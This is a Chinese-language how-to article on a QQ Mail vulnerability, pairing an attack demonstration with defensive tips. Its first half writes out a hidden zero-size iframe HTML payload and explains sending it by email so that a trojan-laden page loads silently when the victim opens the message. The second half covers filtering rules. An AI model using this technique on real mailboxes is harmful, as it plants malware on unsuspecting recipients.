防不胜防――QQ Mail漏洞攻防演练

如今，使用QQ的用户非常多，为了方便，很多用户也一直使用QQ邮箱，毕竟在QQ聊天时就可以发邮件比另外打开网页发邮件要方便许多。但是，你可知道QQ邮箱也存在很多漏洞，即使你正常收发邮件，别人也能在“神不知，鬼不觉”的情况下让你运行木马。下面我们看看是如何实现的，以及如何防范。

一、QQ 邮箱漏洞攻击测试

要实现利用QQ邮箱漏洞而让对方中木马，非常简单，只要进行以下的两步即可完成，而且没有什么技术含量：

第一步：打开QQ邮箱，选择“新邮件”，输入收件人的地址，在邮件内容中输入：“＜html＞＜body＞＜iframesrc＝＂http：／／www．＊＊＊＊．com．cn＂width＝＂200＂height＝＂100＂＞＜／body＞＜／html＞”（不含引号，中间的网址可以随意更换，注意一定要用半角的＜＞）。点击右上角的“HTML”按钮，“确定”。（图1）

第二步：再次点击HTML”按钮，这时你可以看到网页的预览，然后发送邮件。

对方接收到邮件后，不管所用的系统(包括Windows XP SP2在内)，都会弹出上面设定大小的网站广告窗口（其中width="200" height="100"就是设定弹出窗口的大小的。）。（图2）

看到这里，可能很多朋友都已经明白如何实现攻击，顺利将木马发送到被攻击者邮件中了。

具体实现方法是：黑客把上面的代码修改为＜html＞＜body＞＜iframe　src＝＂包含有木马的网页＂　width＝＂0＂　height＝＂0＂，这样就可以将短小的木马捆绑在指定的网页中，只要用户点击邮件，就非常容易就把木马种植到被入侵者的机器上了，打开邮件后，木马已经在运行了。

提示：　width＝＂0＂　height＝＂0＂，这表示宽度和高度都为零，这样即可实现隐藏的目的，而让木马悄无声息地运行。

二、如何防范QQ邮箱的漏洞

上面给大家介绍了一个非常简单的攻击实例，也是很多喜欢使用QQ邮箱最容易受到攻击的途径，如何进行有效的防范呢？当然最有效的方式就是不要随意打开不熟悉的邮箱发来的邮件，除此以外，我们还可以从以下几个方面来加强防范。

1.使用QQ Mail的远程控制

QQ Mail提供了与Foxmail相似的“远程管理”功能，而且使用方法很简单:打开QQ Mail后，按下F12键，打开“远程管理”窗口。如果邮件中有诸如“腾讯会员通知”、“你中奖啦”等主题直接删除即可，这些邮件即便不包含病毒，也多是垃圾信息。

2.使用QQ Mail的邮件规则

利用QQ Mail的邮件规则，我们可以更进一步保护好自己的系统。

打开QQ Mail，选择菜单中的“工具邮件过滤规则”。 在弹出窗口中点击“新建”按钮，接着在“过滤项”下选择“非QQ邮件”，点击“确定”。再次点击“新建”按钮，在“过滤项”下选择“非地址簿中用户发来的邮件”，然后在地址簿中加上你信任的QQ好友邮箱即可。 （图3）